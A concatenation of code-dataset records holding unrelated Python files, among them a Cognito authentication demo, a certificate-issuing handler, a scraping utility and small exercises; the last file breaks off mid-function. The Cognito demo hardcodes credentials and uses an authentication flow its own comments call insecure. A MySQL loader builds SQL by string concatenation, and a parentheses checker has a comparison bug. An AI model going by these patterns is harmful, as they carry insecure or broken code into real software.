cols=len(l_col_names))\n table.style.paragraph_format.left_indent = Inches(left_indent)\n table.alignment = WD_TABLE_ALIGNMENT.CENTER\n\n # Build header row\n row = table.rows[0]\n l_cells = row.cells\n for cell, name in zip(l_cells, l_col_names):\n cell.text = name\n cell.paragraphs[0].runs[0].bold = True\n cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n cell.vertical_alignment = WD_ALIGN_VERTICAL.CENTER\n\n # Build body rows\n for l_row_values in l_values:\n l_cells = table.add_row().cells\n for i, (cell, name) in enumerate(zip(l_cells, l_row_values)):\n cell.text = name if isinstance(name, (str, unicode)) else str(name)\n cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n cell.vertical_alignment = WD_ALIGN_PARAGRAPH.CENTER\n if i == index_column:\n cell.paragraphs[0].runs[0].bold = True\n\n def add_field(self, title, value, left_indent=0., space_before=0.06, space_after=0.):\n\n # create and format paragraph\n p = self.document.add_paragraph()\n p.paragraph_format.left_indent = Inches(left_indent)\n p.paragraph_format.space_before = Inches(space_before)\n p.paragraph_format.space_after = Inches(space_after)\n tab = ' ' + \" \".join(['.'] * ((self.field_size - len(title)) / 2)) + ' ' * (len(title) % 2)\n\n # Add info\n p.add_run(title).bold = True\n p.add_run(tab)\n p.add_run(value if isinstance(value, (str, unicode)) else str(value))\n\n def add_simple_paragraph(self, l_runs, break_run=False, left_indent=0., space_before=0.06, space_after=0.,\n bold=False, alignment=None):\n\n p = self.document.add_paragraph()\n\n if alignment == 'center':\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n elif alignment == 'right':\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\n\n p.paragraph_format.left_indent = Inches(left_indent)\n p.paragraph_format.space_before = Inches(space_before)\n p.paragraph_format.space_after = Inches(space_after)\n\n for text in l_runs:\n r = p.add_run(text)\n r.bold = bold\n\n if break_run:\n r.add_break()\n\n def add_footer(self, text):\n footer = self.document.sections[0].footer\n p = footer.paragraphs[0]\n p.alignment = WD_ALIGN_PARAGRAPH.CENTER\n r = p.add_run(text)\n r.add_break()\n p.add_run('CASOE')\n","sub_path":"facile/core/document_generator.py","file_name":"document_generator.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460667126","text":"#!/usr/bin/env python3\n# Demonstrates the use of Python to work with Cognito.\n# Create a new a user, log in, check tokens and call an API.\n# The purpose was to learn about Cognito. Security has been\n# circumvented in the interest of keeping it simple.\n# Notably, the authentication procedure uses the most insecure\n# method. This code is not intended for use in production.\n#\n# https://www.neant.ro/aws/working-with-cognito-and-api-gateway-in-python.html\n\nimport argparse\nimport boto3\nimport requests\nfrom botocore.exceptions import ClientError\nfrom pprint import pprint\nfrom jose import jwt, jwk\nfrom jose.utils import base64url_decode\n\n\ndef sign_up():\n cidp = boto3.client('cognito-idp')\n\n try:\n # Add user to pool\n sign_up_response = cidp.sign_up(\n ClientId=deadpool['app_client_id'],\n Username=deadpool['username'],\n Password=deadpool['password'],\n UserAttributes=[{'Name': 'email',\n 'Value': deadpool['email']}])\n pprint(sign_up_response)\n print(\" Confirming user...\")\n # Use Admin powers to confirm user. Normally the user would\n # have to provide a code or click a link received by email\n confirm_sign_up_response = cidp.admin_confirm_sign_up(\n UserPoolId=deadpool['user_pool_id'],\n Username=deadpool['username'])\n pprint(confirm_sign_up_response)\n except ClientError as err:\n # Probably user already exists\n print(err)\n\n\ndef init_auth():\n # Log in the user we just created\n global deadpool\n cidp = boto3.client('cognito-idp')\n\n # This is less secure, but simpler\n response = cidp.initiate_auth(\n AuthFlow='USER_PASSWORD_AUTH',\n AuthParameters={\n 'USERNAME': deadpool['username'],\n 'PASSWORD': deadpool['password']},\n ClientId=deadpool['app_client_id'])\n print(\"----- Log in response -----\")\n pprint(response)\n print(\"---------------------------\")\n # AWS official docs on using tokens with user pools:\n # https://amzn.to/2HbmJG6\n # If authentication was successful we got three tokens\n deadpool['jwt_access_token'] = \\\n response['AuthenticationResult']['AccessToken']\n deadpool['jwt_id_token'] = \\\n response['AuthenticationResult']['IdToken']\n deadpool['jwt_refresh_token'] = \\\n response['AuthenticationResult']['RefreshToken']\n\n\ndef check_token(token):\n # AWS docs on verifying tokens:\n # https://amzn.to/2vUwFx7\n # Decode token header\n token_header = jwt.get_unverified_header(token)\n print('Token header:')\n pprint(token_header)\n # Decode token payload\n token_claims = jwt.get_unverified_claims(token)\n print('Token claims:')\n pprint(token_claims)\n # Verify signature, step by step.\n # Original (and better) code in this gist: https://bit.ly/2E3fAFP\n print('Checking key manually')\n # First, get the JSON Web Key Set, which contains two public\n # keys corresponding to the two private keys that could\n # have been used to sign the token.\n r = requests.get(deadpool['jwks_url'])\n if r.status_code == 200:\n jwks = r.json()\n else:\n raise 'Did not retrieve JWKS, got {}'.format(r.status_code)\n # The token header contains a field named 'kid', which stands\n # for Key ID. The JWKS also contains two 'kid' fields, one for\n # each key. The 'kid' in the header tells us which public key\n # must be used to verify the signature.\n kid = token_header['kid']\n # Search the JWKS for the proper public key\n key_index = -1\n for i in range(len(jwks['keys'])):\n if kid == jwks['keys'][i]['kid']:\n key_index = i\n break\n if key_index == -1:\n print('Public key not found, can not verify token')\n else:\n # Convert public key\n public_key = jwk.construct(jwks['keys'][key_index])\n # Get claims and signature from token\n claims, encoded_signature = token.rsplit('.', 1)\n # Verify signature\n decoded_signature = base64url_decode(\n encoded_signature.encode('utf-8'))\n if not public_key.verify(claims.encode(\"utf8\"),\n decoded_signature):\n print('Signature verification failed')\n else:\n print('Signature successfully verified')\n\n\ndef decode_token(token):\n # Executing decode() on the token will return the header or raise\n # an error if checking the signature or one of the claims fails.\n # See https://python-jose.readthedocs.io/en/latest/jwt/api.html\n pprint(jwt.decode(\n token,\n requests.get(deadpool['jwks_url']).json()))\n\n\ndef call_api(token):\n headers = {'Authorization': token}\n url = deadpool['api_url']\n r = requests.post(url, headers=headers)\n print(r.status_code)\n print(r.text)\n\n\nif __name__ == '__main__':\n optparser = argparse.ArgumentParser(description='Cognito demo')\n optparser.add_argument('-p',\n '--profile',\n help='aws credentials profile')\n args = optparser.parse_args()\n\n if args.profile:\n boto3.setup_default_session(profile_name=args.profile)\n\n global deadpool # Yes, global. This isn't production code\n deadpool = {}\n # Put in your own values. These are fake\n deadpool['user_pool_id'] = 'eu-central-1_a5NXAWJDK'\n deadpool['region'] = 'eu-central-1'\n deadpool['jwks_url'] = 'https://cognito-idp.{}.amazonaws.com/{}/' \\\n '.well-known/jwks.json'.format(\n deadpool['region'],\n deadpool['user_pool_id'])\n deadpool['app_client_id'] = '3rb9mhrfqme2lbjepb353jrlml'\n deadpool['app_client_secret'] = \\\n 'https://stackoverflow.com/questions/1306550/' + \\\n 'calculating-a-sha-hash-with-a-string-secret-key-in-python'\n deadpool['username'] = 'cognito-py-demo'\n deadpool['password'] = 'D0lphins!'\n deadpool['email'] = 'cognito-py-demo@antispam.com'\n deadpool['api_url'] = 'https://' \\\n '4a48x6598i.execute-api.eu-central-1.amazonaws.com/prod/insert-login'\n\n print('Signing up...')\n sign_up()\n print('Authenticating...')\n init_auth()\n print('\"Manually\" check access token...')\n check_token(deadpool['jwt_id_token'])\n print('Decode token, also runs checks...')\n decode_token(deadpool['jwt_access_token'])\n print('POST to API...')\n call_api(deadpool['jwt_id_token'])\n","sub_path":"python-user-mgmt/cognito-functions-test.py","file_name":"cognito-functions-test.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589380917","text":"import os\nfrom configparser import ConfigParser\nimport json\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.x509.oid import NameOID\n\nfrom cert_processor import CertProcessor\nfrom cert_processor import CertProcessorInvalidSignatureError\nfrom cert_processor import CertProcessorKeyNotFoundError\nfrom cert_processor import CertProcessorMismatchedPublicKeyError\nfrom cert_processor import CertProcessorUntrustedSignatureError\nfrom cert_processor import CertProcessorNotAdminUserError\nfrom cert_processor import CertProcessorNoPGPKeyFoundError\nfrom logger import logger\nfrom sync import Sync\nfrom utils import error_response\nfrom utils import write_sig_to_file\nfrom utils import get_config_from_file\n\n\nclass GPGKeyNotFoundException(Exception):\n pass\n\n\nclass Handler:\n def __init__(self, config=None):\n if config is None:\n config = get_config_from_file(\"config.ini\")\n self.config = config\n # Seed the trust stores\n Sync(self.config).seed()\n self.cert_processor = CertProcessor(config)\n\n def create_cert(self, body):\n \"\"\"Create a certificate.\"\"\"\n lifetime = int(body[\"lifetime\"])\n min_lifetime = int(self.config.get(\"mtls\", \"min_lifetime\", fallback=60))\n max_lifetime = int(self.config.get(\"mtls\", \"max_lifetime\", fallback=0))\n if lifetime < min_lifetime:\n logger.info(\n \"User requested lifetime less than minimum. {} < {}\".format(\n lifetime, min_lifetime\n )\n )\n return error_response(\n \"lifetime must be greater than {} seconds\".format(min_lifetime)\n )\n if max_lifetime != 0:\n if lifetime > max_lifetime:\n logger.info(\n \"User requested lifetime greater than maximum. {} < {}\".format(\n lifetime, max_lifetime\n )\n )\n return error_response(\n \"lifetime must be less than {} seconds\".format(max_lifetime)\n )\n csr_str = body[\"csr\"]\n csr = self.cert_processor.get_csr(csr_str)\n if csr is None:\n return error_response(\"Could not load CSR\")\n try:\n logger.info(\"create_cert: get csr_public_bytes\")\n csr_public_bytes = csr.public_bytes(serialization.Encoding.PEM)\n logger.info(\"create_cert: write to temp sig file\")\n sig_path = write_sig_to_file(body[\"signature\"])\n logger.info(\"create_cert: get fingerprint\")\n fingerprint = self.cert_processor.verify(csr_public_bytes, sig_path)\n logger.info(\"create_cert: remove sig file\")\n os.remove(sig_path)\n except CertProcessorUntrustedSignatureError as e:\n logger.info(\"Unauthorized: {}\".format(e))\n return error_response(\"Unauthorized\", 403)\n except CertProcessorInvalidSignatureError:\n logger.info(\"Invalid signature in CSR.\")\n return error_response(\"Invalid signature\", 401)\n except Exception as e:\n logger.critical(\"Unknown Error: {}\".format(e))\n return error_response(\"Internal Server Error\", 500)\n if csr is None:\n logger.info(\"Invalid CSR.\")\n return error_response(\"Invalid CSR\")\n cert = None\n try:\n logger.info(f\"create_cert: generating certificate for: {fingerprint}\")\n cert = self.cert_processor.generate_cert(csr, lifetime, fingerprint)\n logger.info(f\"create_cert: sending certificate to client for: {fingerprint}\")\n return json.dumps({\"cert\": cert.decode(\"UTF-8\")}), 200\n except CertProcessorKeyNotFoundError:\n logger.critical(\"Key missing. Service not properly initialized\")\n return error_response(\"Internal Error\")\n except CertProcessorMismatchedPublicKeyError:\n logger.error(\"CSR Public Key does not match found certificate.\")\n return error_response(\"Internal Error\")\n except CertProcessorNotAdminUserError:\n logger.error(\n \"User {} is not an admin and attempted \".format(fingerprint)\n + \"to generate a certificate they are not allowed to generate.\"\n )\n return error_response(\"Invalid Request\", 403)\n except CertProcessorNoPGPKeyFoundError:\n logger.info(\"PGP Key not found.\")\n return error_response(\"Unauthorized\", 401)\n except Exception as e:\n logger.critical(f\"Unhandled Exception: {e}\")\n return error_response(\"Internal Server Error\", 500)\n\n def revoke_cert(self, body):\n \"\"\"\n A user should be able to revoke their own certificate. An admin should\n be able to revoke the certificate of any user.\n\n Args:\n body: A dictionary from the JSON input.\n\n Returns:\n (json, int): a tuple of the json response and http status code.\n \"\"\"\n is_admin = False\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n json.dumps(body[\"query\"]).encode(\"UTF-8\"), sig_path\n )\n is_admin = True\n logger.info(\n \"Admin {adminfp} revoking certificate with query {query}\".format(\n adminfp=fingerprint, query=json.dumps(body[\"query\"])\n )\n )\n os.remove(sig_path)\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n try:\n fingerprint = self.cert_processor.verify(\n json.dumps(body[\"query\"]).encode(\"UTF-8\"), sig_path\n )\n logger.info(\n \"User {userfp} revoking certificate with query {query}\".format(\n userfp=fingerprint, query=json.dumps(body[\"query\"])\n )\n )\n os.remove(sig_path)\n except (\n CertProcessorInvalidSignatureError,\n CertProcessorUntrustedSignatureError,\n ):\n os.remove(sig_path)\n return error_response(\"Unauthorized\", 403)\n\n certs = self.cert_processor.storage.get_cert(**body[\"query\"])\n if certs is None:\n return error_response(\"No Cert to revoke\")\n for cert in certs:\n cert = x509.load_pem_x509_certificate(\n str(cert).encode(\"UTF-8\"), backend=default_backend()\n )\n self.cert_processor.revoke_cert(cert.serial_number)\n return json.dumps({\"msg\": \"success\"}), 200\n\n def add_user(self, body, is_admin=False):\n \"\"\"Add a user or admin.\"\"\"\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n body[\"fingerprint\"].encode(\"UTF-8\"), sig_path\n )\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n os.remove(sig_path)\n logger.error(\n \"Invalid signature on adding fingerprint: {fp}\".format(\n fp=body[\"fingerprint\"]\n )\n )\n return error_response(\"Unauthorized\", 403)\n # Remove signature file\n os.remove(sig_path)\n\n fingerprint = body[\"fingerprint\"]\n\n try:\n if is_admin:\n has_user = self.has_user(self.cert_processor.admin_gpg, fingerprint)\n if not has_user:\n logger.info(\n \"Admin {adminfp} adding admin user {userfp}\".format(\n adminfp=fingerprint, userfp=body[\"fingerprint\"]\n )\n )\n # Add a user to the admin trust store\n self.add_and_trust_user(self.cert_processor.admin_gpg, fingerprint)\n\n has_user = self.has_user(self.cert_processor.user_gpg, fingerprint)\n\n if not has_user:\n # Add the user to the user trust store\n logger.info(\n \"Admin {adminfp} adding admin user {userfp}\".format(\n adminfp=fingerprint, userfp=body[\"fingerprint\"]\n )\n )\n self.add_and_trust_user(self.cert_processor.user_gpg, fingerprint)\n return json.dumps({\"msg\": \"success\"}), 201\n except GPGKeyNotFoundException:\n return (\n json.dumps({\"msg\": \"Key not found on keyserver. Could not import\"}),\n 422,\n )\n\n def has_user(self, gpg, fingerprint):\n keys = gpg.list_keys(keys=fingerprint)\n if len(keys) == 0:\n return False\n return True\n\n def add_and_trust_user(self, gpg, fingerprint):\n result = self.cert_processor.user_gpg.recv_keys(\n self.config.get(\"gnupg\", \"keyserver\", fallback=\"keyserver.ubuntu.com\"),\n fingerprint,\n )\n if result.count is None or result.count == 0:\n raise GPGKeyNotFoundException()\n self.cert_processor.user_gpg.trust_keys([fingerprint], \"TRUST_ULTIMATE\")\n\n def remove_user(self, body, is_admin=False):\n \"\"\"Remove a user or admin.\"\"\"\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n body[\"fingerprint\"].encode(\"UTF-8\"), sig_path\n )\n logger.info(\n \"Admin {adminfp} adding user {userfp}\".format(\n adminfp=fingerprint, userfp=body[\"fingerprint\"]\n )\n )\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n os.remove(sig_path)\n logger.error(\n \"Invalid signature on adding fingerprint: {fp}\".format(\n fp=body[\"fingerprint\"]\n )\n )\n return error_response(\"Unauthorized\", 403)\n # Remove signature file\n os.remove(sig_path)\n\n if is_admin:\n # Add a user to the admin trust store\n self.cert_processor.admin_gpg.delete_keys(body[\"fingerprint\"])\n\n # Add the user to the user trust store\n self.cert_processor.user_gpg.delete_keys(body[\"fingerprint\"])\n return json.dumps({\"msg\": \"success\"}), 201\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":10731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193441233","text":"\"\"\"Exercício Python 083: Crie um programa onde o usuário digite uma expressão\nqualquer que use parênteses. Seu aplicativo deverá analisar se a expressão\npassada está com os parênteses abertos e fechados na ordem correta.\"\"\"\n\ncheck = []\nexpression = str(input('Digite a expressão: '))\n\nfor c in expression:\n if c == '(':\n check.append(c)\n elif c == ')':\n if len(check) > 0:\n check.pop()\n else:\n check.append(c)\n\nif check == 0:\n print('expressão correta')\nelse:\n print('expressão incorreta')\n","sub_path":"ExerciceList/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333907951","text":"# https://www.hackerrank.com/challenges/30-binary-trees/problem\n\ndef levelOrder(self,root):\n leafs = [root]\n while len(leafs) > 0:\n leaf = leafs.pop(0)\n print(leaf.data, end=\" \")\n if leaf.left:\n leafs.append(leaf.left)\n if leaf.right:\n leafs.append(leaf.right)","sub_path":"30 Days of Code/Day 23 - BST Level-Order Traversal.py","file_name":"Day 23 - BST Level-Order Traversal.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432434867","text":"from django.views.decorators.http import require_POST\nfrom django.utils.timezone import now\nfrom django.shortcuts import reverse, redirect, get_object_or_404\nfrom coupons.models import Coupon\n\n\n@require_POST\ndef activate_coupon(request):\n code = request.POST.get('code')\n if code:\n coupon = get_object_or_404(Coupon, code=code,\n valid_to__gte=now(),\n valid_from__lte=now())\n if coupon:\n request.session['coupon_code'] = code\n return redirect(reverse('bucket:bucket'))","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149733237","text":"'''\r\nCreated on 2016. 9. 24.\r\n\r\n@author: Administrator\r\n'''\r\n\r\n# 파일 테스트 , 교제 p333\r\n# 시리얼, 페러렐 통신등 모두 파일을 사용하기 때문에.. 중요함..\r\n\r\ndef fileWrite():\r\n print('file write ....')\r\n fp = open('test.log', 'w')\r\n print(\"fp.tell:\", fp.tell())\r\n fp.write('hello')\r\n fp.seek(3) # file pointer의 값을 이동시킨다.\r\n print(\"fp.tell:\", fp.tell())\r\n fp.write('hello')\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n \r\ndef fileRead():\r\n print('file read ....')\r\n fp = open('test.log','r')\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read()\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n print(rd)\r\n \r\ndef fileWrite1():\r\n print('file write ....')\r\n fp = open('test.log', 'w')\r\n fp.write('abcdefghijklmnop')\r\n fp.close()\r\n \r\ndef fileWrite2():\r\n fp = open('test.log', 'w')\r\n fp.write('abc\\ndef\\nghi\\njkl\\nmno')\r\n fp.close()\r\n\r\ndef fileRead1():\r\n print('file read ....')\r\n fp = open('test.log','r')\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read(3)\r\n print(rd)\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read(3)\r\n print(rd)\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n\r\n# def fileRead2():\r\n# fp = open('test.log','r')\r\n# while True:\r\n# rd = fp.read(3)\r\n# if not rd:\r\n# break\r\n# print(rd)\r\n# fp.close()\r\n \r\ndef fileRead2():\r\n fp = open('test.log','r')\r\n while True:\r\n rd = fp.read(3)\r\n if not rd:\r\n break\r\n print(rd)\r\n fp.close()\r\n\r\ndef fileRead3():\r\n fp = open('test.log','r')\r\n for rd in fp: # readline으로 동작\r\n print(rd)\r\n fp.close()\r\n\r\ndef fileRead4():\r\n fp = open('test.log','r')\r\n rd = fp.readlines()\r\n print(rd)\r\n fp.close()\r\n\r\n \r\nif __name__ == '__main__':\r\n# fileWrite()\r\n# fileRead()\r\n# fileWrite1()\r\n# fileRead1()\r\n# fileWrite1()\r\n# fileRead2()\r\n fileWrite2()\r\n fileRead4()\r\n ","sub_path":"fun_file.py","file_name":"fun_file.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"622543254","text":"# https://atcoder.jp/contests/arc004/tasks/arc004_2\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\ndef resolve():\n n=int(input())\n D=[int(input()) for _ in range(n)]\n m=max(D); S=sum(D)\n print(S)\n print(max(0,2*m-S))\nresolve()\n","sub_path":"ARC004/b_maximum_and_minimum.py","file_name":"b_maximum_and_minimum.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415013937","text":"import pymysql\n\n# Establish connection and create cursor object.\ndef create_connection(host, user, pwd, db):\n connection = pymysql.connect(host = host,\n user = user,\n password = pwd,\n db = db)\n cursor = connection.cursor()\n return cursor, connection\n\n\n# Insert rows into table.\ndef insert(df, cursor, connection):\n # comma separated list of columns.\n cols = \",\".join(df.columns.tolist())\n\n print(\"Starting INSERTS for \",df.name)\n for row in df.itertuples(index = False):\n vals = \",\".join(['\"{}\"'.format(str(i)) for i in list(row)])\n sql_insert = \"INSERT INTO \" + df.name + \" (\" + cols + \") VALUES (\" + vals + \");\"\n cursor.execute(sql_insert)\n\n connection.commit()\n print(\"Completed INSERTS for \",df.name)\n\n# identify the latest game in the database.\ndef latest_info(cursor):\n cursor.execute(\"SELECT * FROM games ORDER BY ID DESC LIMIT 1\")\n return cursor.fetchall()\n \n\n# Update tables with latest games.\ndef update(df, cursor, connection):\n\n # comma separated list of columns.\n cols = \",\".join(df.columns.tolist())\n\n for row in df.itertuples(index = False):\n vals = ['\"{}\"'.format(str(i)) for i in list(row)]\n vals[0] = pymysql.NULL\n vals = \",\".join(vals)\n sql_insert = \"INSERT INTO \" + df.name + \" (\" + cols + \") VALUES (\" + vals + \");\"\n # print(sql_insert)\n cursor.execute(sql_insert)\n\n connection.commit()\n","sub_path":"Load.py","file_name":"Load.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546190751","text":"import datetime\n\nimport bs4\nimport zxing\nimport requests\nimport time\nimport os, sys\nimport urllib.request\nimport re\n\nclass Utils(object):\n\n @staticmethod\n def isInBalckList(blacklist, toSearch):\n if blacklist is None:\n return False\n for item in blacklist:\n if toSearch.find(item) != -1:\n return True\n return False\n\n @staticmethod\n def getTimeFromStr(timeStr):\n # 13:47:32 or 2016-05-25 or 2016-05-25 13:47:32\n # all be transformed to datetime\n if '-' in timeStr and ':' in timeStr:\n return datetime.datetime.strptime(timeStr, \"%Y-%m-%d %H:%M:%S\")\n elif '-' in timeStr:\n return datetime.datetime.strptime(timeStr, \"%Y-%m-%d\")\n elif ':' in timeStr:\n date_today = datetime.date.today()\n date = datetime.datetime.strptime(timeStr, \"%H:%M:%S\")\n # date.replace(year, month, day):生成一个新的日期对象\n return date.replace(year=date_today.year, month=date_today.month, day=date_today.day)\n else:\n return datetime.date.today()\n\n # 该image是否为二维码\n def isQRImages(image_paths):\n if image_paths is None:\n return False\n reader = zxing.BarCodeReader()\n # print(image_paths)\n for image_path in image_paths:\n image_path = str(image_path).replace(\"\\\\\", \"/\")\n print(image_path)\n barcode = reader.decode(image_path)\n if barcode is None:\n print(\"is None\")\n continue\n QR_content = barcode.parsed\n if QR_content != '':\n print(\"这个是二维码\")\n return True\n else:\n print(\"这个不是二维码\")\n print(\"不存在二维码\")\n return False\n\n # 该图片herf是不是二维码\n @staticmethod\n def isNotExitQRImages(imageURLs):\n if imageURLs is None:\n return True\n results_path = os.path.join(sys.path[0], \"stemp\")\n if not os.path.isdir(results_path):\n os.makedirs(results_path)\n\n imagePathAndImageNames = []\n imageRealPathAndNames = []\n i = 1\n for url in imageURLs:\n # 下载图片\n # 本地保存的地址\n FILETIMEFORMAT = '%Y%m%d_%X'\n file_time = 'c' + time.strftime(FILETIMEFORMAT, time.localtime()).replace(':', '')\n imageName = file_time + \"_\" + str(i) + '.png'.strip(' ')\n imageRealPathAndName = os.path.join(results_path, imageName).strip(' ')\n i = i + 1\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n open(imageRealPathAndName, 'wb').write(r.content) # 将内容写入图片\n del r\n imageRealPathAndNames.append(imageRealPathAndName)\n path = str(os.path.join(\"stemp\", str(imageName)))\n imagePathAndImageNames.append(path)\n isExitQRImages = Utils.isQRImages(imagePathAndImageNames)\n # 删除本地图片\n for imageRealPathAndName in imageRealPathAndNames :\n os.remove(imageRealPathAndName)\n if isExitQRImages:\n return False\n else:\n return True\n\n # 通过网页地址获取网页内容\n @staticmethod\n def getHtmlContentFromURL(url):\n # 获取HTML内容\n return urllib.request.urlopen(url).read().decode('utf-8')\n\n # 通过网页内容获取网页内的图片地址\n @staticmethod\n def getImageURLFromURL(url):\n htmlContent = Utils.getHtmlContentFromURL(url)\n # 获取HTML内容的图片URL\n reg = r'src=\"(.*?\\.(jpg|png|gif))\"'\n img = re.compile(reg)\n imglist = re.findall(img, htmlContent)\n return imglist\n\n # 通过网页内容获取网页内的图片地址(不包含用户头像)\n ##调用方式\n # htmlContent = Utils.Utils.getImageURLNotUserHeadFromURL(\"https://www.douban.com/group/topic/151841534/\", tag='div', attrs={'class': {'user-face','side-reg'}})\n @staticmethod\n def getImageURLNotUserHeadFromURL(htmlContent, tag='div', attrs={'class': {'user-face','side-reg'}}):\n # 去除头像标签\n soup = bs4.BeautifulSoup(htmlContent, 'html.parser')\n [i.extract() for i in (soup.findAll(name=tag, attrs=attrs))]\n # 获取HTML内容的图片URL\n reg = r'src=\"(.*?\\.jpg)\"'\n img = re.compile(reg)\n imglist = re.findall(img, str(soup))\n return imglist\n\n #获取标题和正文的文字内容\n @staticmethod\n def getTitleAndContentTextFromURL(htmlContent, titleTag='h1', titleAttrs={}, contentTag='div',\n contentAttrs={'id': 'link-report'}):\n # 源代码转换格式 \tBeautifulSoup(htmlContent, \"html.parser\")\n htmlContentParser = bs4.BeautifulSoup(htmlContent, 'lxml')\n # title区域\n titleText = htmlContentParser.findAll(name=titleTag)\n\n titleText = Utils.subTab(titleText)\n # 正文区域\n contentText = htmlContentParser.findAll(name=contentTag, attrs=contentAttrs)\n contentText = Utils.subTab(contentText)\n\n return titleText, contentText\n\n # 处理文档,去除标签\n @staticmethod\n def subTab(html):\n rc = re.compile(\"\\<.*?\\>\")\n return rc.sub('', str(html))\n\n # 获取价格区间\n @staticmethod\n def getPriceFromText(htmlContentText):\n if (htmlContentText is None):\n return -1\n # 处理文档,去除标签\n contentText = Utils.subTab(htmlContentText)\n\n p = re.compile(r'\\d+(?=\\u5143)')# 数字串+元\n price = re.findall(p, contentText)\n maxPrice = minPrice = -1\n if price :\n price = list(map(int, price))\n if price:\n if len(price) >= 2:\n maxPrice = max(price)\n print(maxPrice)\n minPrice = min(price)\n else:\n maxPrice = minPrice = max(price)\n else:\n return -1\n return minPrice, maxPrice\n\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"353209611","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.1\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# + endofcell=\"--\"\n# # +\n\n# +\n# Data processing script to create a dense baseline dataframe for CLD.jl from the TADPOLE dataset\n\nimport pandas as pd\nimport pickle\n\nwith open(\"../out/merged_data.pkl\", \"rb\") as pickle_file:\n data = pickle.load(pickle_file)\n\n# # +\nmodalities_to_use = [\"diagnosis_latest\",\n\"snp_labeled\",\n\"MRI_FSX_SV_labeled_latest\",\n\"MRI_FSX_CV_labeled_latest\",\n\"MRI_FSX_SA_labeled_latest\",\n\"MRI_FSX_TA_labeled_latest\",\n\"MRI_FSX_TS_labeled_latest\",\n\"MRI_FSL_SV_labeled_latest\",\n\"MRI_FSL_CV_labeled_latest\",\n\"MRI_FSL_SA_labeled_latest\",\n\"MRI_FSL_TA_labeled_latest\",\n\"MRI_FSL_TS_labeled_latest\",\n]\n\n\"\"\" Column 'ST8SV_UCSFFSL_02_01_16_UCSFFSL51ALL_08_01_16' had 389 out of 733 rows with N/A. \nColumn 'ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16' had 275 out of 733 rows with N/A. \n36 other columns had all N/As (so they are also removed in step below, and the remaining columns all had less than 200 N/A's)\nBy dropping these two columns, we go from 270 rows after removing N/A's to 524 rows\n\"\"\"\ndrop = [\"ST8SV_UCSFFSL_02_01_16_UCSFFSL51ALL_08_01_16\", \"ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16\"]#\"FAQ\", \"MOCA\", \"CDRSB\", \"ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16\"]#, \"ADAS11\", \"ADAS13\", \"MMSE\"]\n\n\n# -\n\ndef get_data_for_experiment_with_modalities(modalities, target_modality, target_column, data, columns_to_drop=None, verbose=False):\n \"\"\"Clean and return the data with the particular modalities and desired target\n \n Args:\n modalities (list): The list of modalities to use as features\n target_modality (str): The name of the modality with the desired target\n target_column (str): The name of the column within the target\n data (dict): The saved dataset\n columns_to_ignore (list, optional): Any columns to drop from the dataframe before cleaning the data. Defaults to None.\n verbose (bool, optional): Whether to display verbose print messages. Defaults to False.\n \n Returns:\n tuple: The features and targets cleaned up for experimentation\n \"\"\"\n\n df = pd.concat([pd.DataFrame.from_records(data[modality]).T for modality in modalities], axis=1)\n \n 